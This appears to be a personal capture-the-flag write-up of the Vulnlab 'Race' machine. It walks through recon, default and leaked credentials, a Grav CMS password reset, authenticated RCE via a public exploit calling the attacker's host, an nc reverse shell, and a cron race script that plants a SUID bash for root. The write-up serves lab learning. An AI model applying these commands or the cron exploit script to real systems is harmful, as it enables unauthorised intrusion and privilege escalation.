Here is my notes on RACE box from Vulnlab which deployed to Hackthebox.
RACE: 10.10.93.82
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62b01ec5e8815c9439ed377e21cfb1a8 (ECDSA)
|_ 256 37a3d3cd35dcccd8db3cc34dad2229a9 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).'
index.html [Status: 200, Size: 163, Words: 25, Lines: 9, Duration: 114ms]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 144ms]
phpsysinfo [Status: 401, Size: 458, Words: 42, Lines: 15, Duration: 132ms]
index.html:
Grav with by Trilby Media.
phpsysinfo:
admin:admin - WORKS !
/usr/sbin/cron -f -P:
/usr/bin/curl --insecure --connect-timeout 60 -u backup:Wedobackupswithsecur3password5.Noonecanhackus! -T /var/www/html/racers/backup/ sftp://offsite-backup.race.vl/backups/
GravCMS Notes:
https://pr0m0ly.notion.site/Race-a90536f909be45b780b42d1dd4fae551
/racers/admin - Interesting.
backup:Wedobackupswithsecur3password5.Noonecanhackus! - WORKS !
#FROM phpsysinfo.
Generate Backup and download it.
CHANGELOG.md:
Grav CMS - # v1.7.43
┌──(root㉿kali)-[/home/…/10.10.93.82/Grav/user/accounts]
└─# pwd
/home/kali/VL/RACE/10.10.93.82/Grav/user/accounts
┌──(root㉿kali)-[/home/…/10.10.93.82/Grav/user/accounts]
└─# ls
admin.yaml backup.yaml patrick.yaml
┌──(root㉿kali)-[/home/…/10.10.93.82/Grav/user/accounts]
└─# tree -r .
.
├── patrick.yaml
├── backup.yaml
└── admin.yaml
1 directory, 3 files
cat *.yaml
[SNIP]
email: patrick@race.vl
fullname: 'Patrick P. Rick'
language: en
content_editor: default
twofa_enabled: false
twofa_secret: LW35AG7V4U4NLOBVU5P6NG35GP5YWJKT
avatar: { }
hashed_password: $2y$10$TWyPZQDqMZJJ/0pLdWUbY.TxVKVMHP3LzfUTo3BYWFRID7uXaoXcC
reset: '553e7719d2674ae2bfb29eb0aaa806d0::1701718773'
access:
site:
login: true
admin:
login: true
super: false
cache: false
configuration:
system: true
site: true
media: false
security: false
info: false
pages: false
users: false
pages: true
maintenance: true
themes: true
http://10.10.69.41/racers/forgot_password
However the reset token was expired so just reset with patrick@race.vl as usual then download backup again for the new token.
We have a reset token: 3a5635064ec46ef002814d4818c0e3ea
With this token we can able to reset the password for patrick then login to it as patrick afterwards.
http://10.10.117.208/racers/reset_password/task:login.reset/token:3a5635064ec46ef002814d4818c0e3ea/user:patrick@race.vl/nonce:7dd69d42bfd1ac89301c8e5c4827f85d
Source Page of /racers/reset_password like one above:
forgot-form-none = 7dd69d42bfd1ac89301c8e5c4827f85d
Wedobackupswithsecur3password5.Noonecanhackus!
Password has been reset !
patrick@race.vl: Wedobackupswithsecur3password5.Noonecanhackus!
Login /admin with patrick credential, the one we were set it up and IT WORKS !
https://github.com/gunzf0x/Grav-CMS-RCE-Authenticated
python3 Grav_CMS_RCE.py -t http://10.10.117.208/racers/admin -u 'patrick@race.vl' -p 'Wedobackupswithsecur3password5.Noonecanhackus!' -x 'wget http://10.8.0.71'
[*] Attacking 'http://10.10.117.208/racers/admin:80'...
[*] Uploading payload...
[*] Executing payload...
[*] Payload deleted. Actually, what payload? Nothing happened here ;)
#Blind-RCE WORKS !
http://10.10.117.208/racers/shell.php
#WEB-SHELL !
Convert it to a user reverse-shell as usual.
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.117.208] 59298
www-data@race:/var/www/html/racers$ whoami
whoami
www-data
www-data@race:/var/www/html/racers$ hostname
hostname
race
www-data@race:/var/www/html/racers$
USER-SHELL !
PRIV ESC:
www-data -> max:
www-data@race:/home/max/race-scripts$ pwd
pwd
/home/max/race-scripts
www-data@race:/home/max/race-scripts$ ls -lah
ls -lah
total 16K
drwxrwsr-x 3 root racers 4.0K Dec 9 2023 .
drwxr-xr-x 6 root root 4.0K Dec 4 2023 ..
drwxr-sr-x 2 root racers 4.0K Dec 9 2023 backup
-rwxr-xr-x 1 root root 361 Dec 5 2023 offsite-backup.sh
www-data@race:/home/max/race-scripts$ cat offsite-backup.sh
cat offsite-backup.sh
#!/usr/bin/bash
OFFSITE_HOST="offsite-backup.race.vl"
SOURCE_DIR="/var/www/html/racers/backup/"
# Disabled USER/PASS for security reasons. Will be provided via environment from cron.
# OFFSITE_USER="max"
# OFFSITE_PASS="ruxai0GaemaS1Rah"
/usr/bin/curl --insecure --connect-timeout 60 -u $OFFSITE_USER:$OFFSITE_PASS -T $SOURCE_DIR sftp://$OFFSITE_HOST/backups/
max:ruxai0GaemaS1Rah
max@race:~$ whoami
max
max@race:~$ hostname
race
max SHELL !
max@race:~$ whoami
max
max@race:~$ hostname
race
max@race:~$ cat user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
max -> root:
Looking back at phpsysinfo again:
/usr/bin/CRON -f -P:
/bin/sh -c /usr/local/bin/secure-cron-runner.sh >/dev/null 2>/dev/null
/usr/bin/bash /usr/local/bin/secure-cron-runner.sh
/usr/bin/bash /usr/local/share/race-scripts/offsite-backup.sh
max@race:~$ ls -lah
total 36K
drwxr-xr-x 5 max max 4.0K Dec 9 2023 .
drwxr-xr-x 4 root root 4.0K Dec 3 2023 ..
lrwxrwxrwx 1 root root 9 Dec 3 2023 .bash_history -> /dev/null
-rw-r--r-- 1 max max 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 max max 3.7K Jan 6 2022 .bashrc
drwxrwxr-x 2 max max 4.0K Dec 4 2023 bin
drwx------ 2 max max 4.0K Dec 3 2023 .cache
drwxrwxr-x 3 max max 4.0K Dec 9 2023 .local
-rw-r--r-- 1 max max 807 Jan 6 2022 .profile
lrwxrwxrwx 1 max max 29 Dec 9 2023 race-scripts -> /usr/local/share/race-scripts
-rw------- 1 max max 37 Dec 9 2023 user.txt
max@race:~$ cd race-scripts
max@race:~/race-scripts$ ls
backup offsite-backup.sh
max@race:~/race-scripts$ ls -lah
total 16K
drwxrwsr-x 3 root racers 4.0K Dec 9 2023 .
drwxr-xr-x 6 root root 4.0K Dec 4 2023 ..
drwxr-sr-x 2 root racers 4.0K Dec 9 2023 backup
-rwxr-xr-x 1 root root 361 Dec 5 2023 offsite-backup.sh
max@race:~/race-scripts$ echo "chmod u+s /bin/bash" > offsite-backup.sh
-bash: offsite-backup.sh: Permission denied
max@race:~/race-scripts$ rm offsite-backup.sh
rm: remove write-protected regular file 'offsite-backup.sh'? y
max@race:~/race-scripts$ ls
backup
max@race:~/race-scripts$ echo "chmod u+s /bin/bash" > offsite-backup.sh
max@race:~/race-scripts$ chmod +x offsite-backup.sh
max@race:~/race-scripts$ cat offsite-backup.sh
chmod u+s /bin/bash
cron bash script exploit:
#Useful for CRON PRIV ESC.
exploit.sh:
#!/bin/bash
current_pid=$(ps aux | grep CRON | grep -v grep | awk '{print $2}')
echo "Current pid is $current_pid"
while true; do
if ps aux | grep 'CRON' | grep -v $current_pid | grep -v 'grep'; then
echo "cp /bin/bash /tmp/pr0" >> /usr/local/share/race-scripts/offsite-backup.sh
echo "chmod u+s /tmp/pr0" >> /usr/local/share/race-scripts/offsite-backup.sh
echo "DONE!"
break;
fi
done
max@race:~/race-scripts$ rm offsite-backup.sh
rm: remove write-protected regular file 'offsite-backup.sh'? y
max@race:~/race-scripts$ cp backup/offsite-backup.sh .
max@race:~/race-scripts$ ls
backup offsite-backup.sh
max@race:~/race-scripts$ chmod +x offsite-backup.sh
max@race:~/race-scripts$ bash /tmp/exploit.sh
Current pid is 1083
^C
max@race:~/race-scripts$ ls
backup offsite-backup.sh
max@race:~/race-scripts$ ls -lah
total 16K
drwxrwsr-x 3 root racers 4.0K Dec 7 20:38 .
drwxr-xr-x 6 root root 4.0K Dec 4 2023 ..
drwxr-sr-x 2 root racers 4.0K Dec 9 2023 backup
-rwxr-xr-x 1 max racers 361 Dec 7 20:38 offsite-backup.sh
max@race:~/race-scripts$ bash /tmp/exploit.sh
Current pid is 21044
max@race:~/race-scripts$ bash /tmp/exploit.sh
Current pid is 21044
root 42435 0.0 0.2 10336 4112 ? S 20:41 0:00 /usr/sbin/CRON -f -P
DONE!
max@race:~/race-scripts$ ls -lah /tmp | grep "pr0"
-rwsr-xr-x 1 root root 1.4M Dec 7 20:41 pr0
max@race:~/race-scripts$ /tmp/pr0 -p
pr0-5.1# whoami
root
pr0-5.1# id
uid=1001(max) gid=1001(max) euid=0(root) groups=1001(max),1002(racers)
pr0-5.1# hostname
race
ROOT-SHELL !
https://pr0m0ly.notion.site/Race-a90536f909be45b780b42d1dd4fae551
pr0-5.1# whoami
root
pr0-5.1# hostname
race
pr0-5.1# pwd
/root
pr0-5.1# ls
conf root.txt snap
pr0-5.1# cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel